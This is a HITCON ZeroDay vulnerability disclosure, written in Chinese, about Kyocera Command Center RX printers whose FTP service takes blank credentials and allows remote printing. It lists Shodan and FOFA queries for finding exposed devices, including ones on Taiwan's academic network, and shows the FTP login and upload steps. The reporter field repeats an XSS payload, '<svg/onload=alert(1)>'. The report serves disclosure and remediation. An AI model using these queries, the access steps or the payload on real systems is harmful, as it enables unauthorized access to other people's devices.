Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-01178
- 發信 Vendor: 台灣京瓷辦公資訊系統股份有限公司
- Title: 台灣京瓷 Kyocera ftp 無認證機制導致印表機可遠端列印
- Introduction: 開放無認證機制的 ftp port
處理狀態
目前狀態
公開
Last Update : 2018/10/21
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2018/08/21 17:25:07 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/21 17:26:07 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/21 17:26:48 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/21 17:29:24 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/21 17:29:41 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/21 18:24:02 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/21 19:40:49 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/21 19:49:14 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/21 19:51:40 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/21 19:53:30 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/21 22:48:20 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/21 23:47:07 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/21 23:54:37 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/22 00:15:29 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
- 2018/08/22 00:15:34 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/08/22 00:28:52 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/08/24 18:08:12 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/08/24 18:08:12 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/08/29 11:08:35 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/10/21 03:00:15 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-01178
- 通報者:morrow (<svg/onload=alert(1)>)
- 風險:高
- 類型:開放危險連接埠 (Discovered Dangerous Opening Port)
參考資料
主機開放了危險的服務,恐造成攻擊者進行惡意攻擊。
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
shodan
Kyocera country:"TW"
title:"Command Center RX"
title:"Command Center RX" country:"TW"
title:"Command Center RX" org:"Taiwan Academic Network (TANet) Information Center"
title:"Command Center RX" org:"Taiwan Academic Network"
https://fofa.so/
title="Command Center RX"
Kyocera country:"TW"
title:"Command Center RX"
title:"Command Center RX" country:"TW"
title:"Command Center RX" org:"Taiwan Academic Network (TANet) Information Center"
title:"Command Center RX" org:"Taiwan Academic Network"
https://fofa.so/
title="Command Center RX"
敘述
該公司(全球,不只台灣)可能所有使用「Command Center RX」類型的產品都存在此弱點
無需透過任何認證機制,可直接訪問,遠端列印文件
bash ~$: ftp 目標IP
Connected to 目標IP
220 設備型號 FTP server
Name (目標IP:root): 按下 ENTER
331 User ok
Password: 按下 ENTER
230 User logged in successfully
Remote system type is Linux.
ftp> ls
200 Command Okay
150 Opening ASCII mode data connection
d-w--w--w- 1 nobody nobody 0 Jan 1 1970 lp1
d-w--w--w- 1 nobody nobody 0 Jan 1 1970 lp2
d-w--w--w- 1 nobody nobody 0 Jan 1 1970 lp3
d-w--w--w- 1 nobody nobody 0 Jan 1 1970 lp4
226 Transfer Complete
ftp > cd lp1
ftp > put 文件學術網路中有許多該公司的設備直接暴露在網路上
經測試後都可以直接可遠端列印,非常危險
建議儘速修改,引免遭到攻擊者蓄意控制或列印
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。